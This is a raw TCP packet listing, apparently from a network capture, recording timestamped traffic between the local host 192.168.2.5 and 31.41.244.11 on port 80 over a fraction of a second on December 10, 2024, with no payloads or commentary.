Dec 10, 2024 11:11:11.696455002 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.697432995 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.697472095 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.697504997 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.697556973 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.698592901 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.698642015 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.698695898 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.698735952 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.699623108 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.699668884 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.699700117 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.699745893 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.700882912 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.700905085 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.700927019 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.700944901 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.701884031 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.701934099 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.701962948 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.702006102 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.702984095 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.703028917 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.703036070 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.703078985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.704070091 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.704123974 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.704181910 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.704229116 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.705174923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.705236912 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.705272913 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.705317974 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.706249952 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.706295013 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.706310034 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.706325054 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.707305908 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.707365036 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.707402945 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.707453012 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.708436012 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.708496094 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.708544970 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.708590984 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.709546089 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.709594011 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.709660053 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.709733963 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.710634947 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.710673094 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.710690975 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.710730076 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.711720943 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.711766958 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.711822987 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.711870909 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.712862968 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.712965012 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.712985992 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.712995052 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.713922024 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.713965893 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.714018106 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.714060068 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.715045929 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.715090990 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.715164900 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.715221882 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.716211081 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.716267109 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.716296911 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.716365099 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.717258930 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.717338085 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.717588902 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.717633963 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.718466997 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.718513012 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.718539000 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.718596935 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.719455004 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.719501019 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.719587088 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.719636917 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.720628977 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.720670938 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.720814943 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.720869064 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.721649885 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.721693993 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.721725941 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.721765995 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.722815990 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.722866058 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.722908020 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.722951889 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.723928928 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.723973989 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.724001884 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.724044085 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.725172043 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.725219011 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.725336075 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.725392103 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.726130009 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.726177931 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.726210117 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.726249933 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.727200031 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.727242947 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.727247000 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.727276087 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.728281975 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.728327990 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.728385925 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.728447914 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.729448080 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.729494095 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.729567051 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.729620934 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.730504036 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.730551004 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.730583906 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.730648994 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.731551886 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.731601954 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.731673956 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.731720924 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.732665062 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.732712984 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.732790947 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.732918024 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.733742952 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.733863115 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.733989000 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.734033108 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.734898090 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.734941959 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.734977961 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.735019922 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.735987902 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.736037970 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.736116886 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.736159086 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.737066984 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.737116098 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.737154007 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.737195015 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.738210917 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.738261938 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.738327980 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.738373995 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.739305973 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.739340067 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.739356995 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.739387035 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.740377903 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.740423918 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.740461111 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.740510941 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.741461992 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.741517067 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.741564989 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.741617918 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.742588043 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.742636919 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.742706060 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.742889881 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.743710995 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.743896961 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.878645897 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.878726959 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.878931046 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.878973961 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.879116058 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.879175901 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.880078077 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.880207062 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.880259991 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.881215096 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.881344080 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.881387949 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.882293940 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.882451057 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.882493019 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.883408070 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.883454084 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.883536100 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.884504080 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.884546995 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.884609938 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.885633945 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.885679007 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.885752916 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.886713982 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.886785984 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.886820078 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.886867046 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.887871027 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.887996912 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.888041019 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.889163017 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.889395952 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.889441013 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.890367031 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.890481949 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.890530109 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.891484022 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.891526937 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.891545057 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.892468929 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.892520905 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.892553091 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.893719912 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.893764019 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.893769026 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.893809080 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.894670963 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.894723892 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.894782066 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.895832062 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.895865917 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.895926952 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.896848917 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.896960020 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.897011042 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.897823095 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.897896051 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.897950888 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.898958921 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.899008989 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.899036884 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.899956942 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.900007963 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.900089025 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.901185989 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.901233912 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.901303053 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.901344061 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.902529001 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.902620077 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.902663946 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.903479099 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.903500080 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.903546095 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.904505014 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.904547930 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.904642105 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.905515909 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.905560970 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.905616045 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.905836105 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.906523943 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.906656981 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.906701088 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.907629967 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.907690048 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.907756090 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.908759117 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.908809900 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.909032106 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.909790993 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.909862995 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.909908056 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.909966946 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.910007954 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.911006927 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.911072016 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.911223888 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.911279917 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.912146091 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.912204981 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.912261009 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.913309097 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.913393974 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.913450003 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.914267063 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.914328098 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.914381027 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.915678978 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.915802956 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.915863991 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.916534901 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.916584969 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.916656017 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.917588949 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.917639971 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.917701006 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.918672085 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.918721914 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.918781042 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.919945002 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.919996023 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.920027971 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.920867920 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.920913935 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.920999050 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.921798944 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.921989918 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.922065973 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.922111034 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.923080921 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.923207045 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.923219919 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.923304081 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.924185038 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.924422979 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.924473047 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.925286055 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.925362110 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.925393105 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.925436020 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.926373005 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.926419020 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.926451921 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.926486969 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.927488089 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.927588940 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.927637100 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.928595066 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.928656101 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.928677082 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.928941965 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.929764032 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.929820061 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.929847002 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.929887056 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.930811882 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.930861950 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.930921078 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.930964947 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.931912899 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.931952000 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.932040930 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.932085991 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.933005095 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.933043003 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.933120966 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.933166027 CET	49828	80	192.168.2.5	31.41.244.11
